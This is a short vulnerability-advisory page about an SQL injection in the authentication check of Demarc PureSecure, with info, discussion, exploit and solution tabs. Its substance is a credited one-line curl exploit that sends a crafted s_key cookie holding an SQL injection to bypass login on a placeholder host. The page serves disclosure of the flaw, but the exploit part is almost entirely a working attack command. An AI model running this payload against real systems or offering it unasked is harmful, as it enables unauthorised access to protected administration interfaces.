Demarc PureSecure Authentication Check SQL Injection Vulnerability

info
discussion
exploit
solution
references

Demarc PureSecure Authentication Check SQL Injection Vulnerability

The following exploit using curl has been provided by pokleyzz sakamaniaka <pokleyzz@hotmail.com>:

curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc